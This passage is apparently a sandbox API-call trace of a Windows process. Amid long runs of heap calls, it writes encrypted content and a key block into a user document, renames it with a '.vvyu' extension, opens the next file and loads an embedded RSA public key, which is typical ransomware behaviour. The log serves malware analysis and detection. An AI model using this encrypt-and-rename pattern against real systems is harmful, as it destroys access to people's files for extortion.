0x2ae6680 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea530 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66e0 [0196.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.874] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0196.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66e0 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae66c8 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0196.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0196.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.877] GetCurrentThreadId () returned 0x5d8 [0196.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2390 [0196.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.878] GetCurrentThreadId () returned 0x5d8 [0196.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0196.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0196.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66e0 [0196.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6740 [0196.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0196.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0196.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0196.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6758 [0196.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66f8 [0196.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0196.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66c8 [0196.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0196.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0196.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0196.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0196.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea530 | out: hHeap=0x2c0000) returned 1 [0196.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.894] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1176e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1176e, lpOverlapped=0x0) returned 1 [0196.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.895] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11773, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.895] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.897] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.897] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.897] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.897] CloseHandle (hObject=0x584) returned 1 [0196.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0196.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x2af3f88 [0196.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0196.900] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\DJyNf5d3ZVp0RV8Gb.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\djynf5d3zvp0rv8gb.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\DJyNf5d3ZVp0RV8Gb.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\djynf5d3zvp0rv8gb.docx.vvyu")) returned 1 [0196.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.902] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0196.904] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5d99300, ftCreationTime.dwHighDateTime=0x1d8a059, ftLastAccessTime.dwLowDateTime=0xf2cc8300, ftLastAccessTime.dwHighDateTime=0x1d8a59c, ftLastWriteTime.dwLowDateTime=0xf2cc8300, ftLastWriteTime.dwHighDateTime=0x1d8a59c, nFileSizeHigh=0x0, nFileSizeLow=0x60e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hsj_qR5BNe5MoizBn.csv", cAlternateFileName="HSJ_QR~1.CSV")) returned 1 [0196.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0196.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.905] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\hsj_qR5BNe5MoizBn.csv") returned=".csv" [0196.905] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\hsj_qR5BNe5MoizBn.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\hsj_qr5bne5moizbn.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.906] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=24805) returned 1 [0196.906] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.909] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x60bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.910] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.911] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.911] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x60e5, lpOverlapped=0x0) returned 1 [0196.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.912] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b640) returned 1 [0196.913] CryptCreateHash (in: hProv=0x31b640, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: 